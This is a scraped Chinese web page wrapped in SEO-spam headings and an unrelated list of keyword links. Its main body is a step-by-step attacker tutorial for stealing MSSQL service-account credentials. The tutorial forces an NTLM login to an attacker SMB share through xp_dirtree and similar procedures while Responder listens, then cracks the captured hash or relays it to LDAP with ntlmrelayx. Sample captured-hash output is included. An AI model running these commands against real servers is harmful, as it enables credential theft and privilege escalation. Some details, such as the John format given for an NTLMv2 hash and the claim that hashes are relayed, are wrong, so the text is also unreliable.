当前位置: 首页 > wzjs >正文

企业做网站分哪几种站长工具在线查询

企业做网站分哪几种,站长工具在线查询,嘉兴网站优化,免费申请一个网站一、原理概述 1、MSSQL 服务器函数: xp_dirtree、xp_fileexist 等存储过程在访问远程 SMB 共享时,会尝试使用服务账户身份进行身份验证。 2、触发 NTLM 认证请求: 当 MSSQL 执行上述函数访问远程路径(如 \\IP\SHARE&#xff0…

一、原理概述

1、MSSQL 服务器函数:

xp_dirtree、xp_fileexist 等存储过程在访问远程 SMB 共享时,会尝试使用服务账户身份进行身份验证。

2、触发 NTLM 认证请求:

当 MSSQL 执行上述函数访问远程路径(如 \\IP\SHARE)时,MSSQL 服务账户会向 SMB 服务器发送 NTLM 认证请求。

3、捕获 NTLM 哈希:

攻击者设置的监听器(如 Responder)能够捕获到这些 NTLM 哈希,进一步可以使用这些哈希进行爆破或中继攻击。

二、主要步骤

1、步骤 1

启动 Responder 监听器(Kali 攻击机)

Responder 是一个能够捕获网络中 NTLM 请求的工具。

在 Kali 上启动 Responder:

sudo responder -I tun0
-I tun0:指定监听的网络接口,通常是 tun0 或 eth0、wlan0 等。确保使用正确的网络接口,特别是当使用 VPN 时,接口可能是 tun0。Responder日志路径:/usr/share/responder/logs。

2、步骤 2

诱导 MSSQL 服务器发起 SMB 请求

在目标 MSSQL 服务器上执行以下 SQL 命令,诱导它连接到你的 SMB 共享:

EXEC master..xp_dirtree '\\10.10.14.XX\share';
10.10.14.XX:将其替换为你 Kali 攻击机的 IP 地址。这条命令会让 MSSQL 尝试列出远程 SMB 路径下的文件和目录,触发 NTLM 身份验证请求。

3、步骤 3

其他可用诱导函数

如果 xp_dirtree 不可用,尝试以下其他函数来诱导 SMB 请求:

EXEC master..xp_fileexist '\\10.10.14.XX\share\test.txt';
EXEC master..xp_subdirs '\\10.10.14.XX\share';

这些命令同样会让 MSSQL 尝试访问指定的 SMB 路径,并触发身份验证请求。

三、捕获 NTLM 哈希

一旦 MSSQL 服务器尝试连接 SMB 共享,Resonpder 会捕获到 NTLM 请求,并显示如下信息:

[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sqlservice
[SMB] NTLMv2-SSP Hash     : sqlservice::sequel:1122334455667788...
NTLMv2-SSP Client:发起请求的客户端 IP。NTLMv2-SSP Username:MSSQL 服务账户的用户名。NTLMv2-SSP Hash:捕获到的 NTLM 哈希。

四、爆破 NTLM 哈希

捕获到的 NTLM 哈希可以使用 John the Ripper 或 Hashcat 进行暴力破解,尝试获取明文密码。

例如使用 john:

john hash.txt --format=NT
hash.txt 是保存 NTLM 哈希的文件。

五、NTLM 中继攻击

一旦捕获到 NTLM 哈希,可以使用 impacket-ntlmrelayx 工具将该哈希中继到目标服务(如 LDAP)进行进一步的攻击。

启动 NTLM 中继攻击:

python3 ntlmrelayx.py -smb2support -t ldap://10.10.11.202
-smb2support:支持 SMB2 协议。-t ldap://10.10.11.202:指定目标服务地址,10.10.11.202 为目标 LDAP 服务器的 IP 地址。这条命令会将捕获到的 NTLM 哈希中继到指定的 LDAP 服务器,从而可能进行身份验证,尝试执行权限提升或其他攻击。

六、相关工具总结

Responder:用于捕获 NTLM 认证请求并显示/保存哈希。

Impacket (ntlmrelayx):用于将捕获的 NTLM 哈希中继到其他服务(如 LDAP、SMB 等),进行进一步的权限提升攻击。

http://www.dtcms.com/wzjs/318340.html

相关文章:

  • php做的网站收录专业搜索引擎seo服务商
  • 做包装的网站网页生成器
  • 外贸网站怎样注册杭州排名优化公司
  • 站酷做网站营销策划案
  • 石家庄网站开发公司电话微商已经被国家定为传销了
  • 龙川县建设网站岳阳seo快速排名
  • 黄页网站怎么查目前引流最好的平台
  • 网站开发工具中的三剑客seo搜索优化费用
  • 如何高效率的建设网站如何把品牌推广出去
  • 淘宝店网站怎么做网络营销咨询公司
  • p2p网站做牛关键词爱站网
  • 网站设置超链接如何做好网络营销推广
  • 甘肃手机版建站系统价格广州品牌seo推广
  • 美乐乐 网站建设北京网站制作
  • 网站建设及 维护合同代写
  • 威海网站制作服务百度ocpc如何优化
  • 免费做微网站搜索引擎大全排名
  • 南宁建设公司网站百度人工客服电话
  • 网站子站建设自查报告宁波seo怎么推广
  • dw软件做网站个人网站规划书模板
  • 网站开发需要怎么做精准营销
  • 深圳分销网站设计公司营销型网站建设策划书
  • 网站建设淘宝评价2022年关键词排名
  • 建设银行河北省分行网站湘潭高新区最新新闻
  • 云南做网站公司企业网站怎么做
  • 用帝国软件做网站的心得在线识别图片
  • 合肥建设集团信息网站百度查询入口
  • 个人博客网站logo免费信息发布平台网站
  • 海口建设网站的公司百度推广seo怎么学
  • 镇江vi设计关键词优化的作用